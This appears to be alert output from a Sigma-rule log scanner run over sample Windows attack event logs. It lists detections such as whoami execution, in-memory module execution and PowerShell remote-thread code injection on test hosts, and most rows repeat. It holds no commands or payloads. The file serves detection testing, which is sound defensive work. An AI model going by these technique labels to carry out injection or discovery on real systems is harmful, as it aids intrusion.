2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
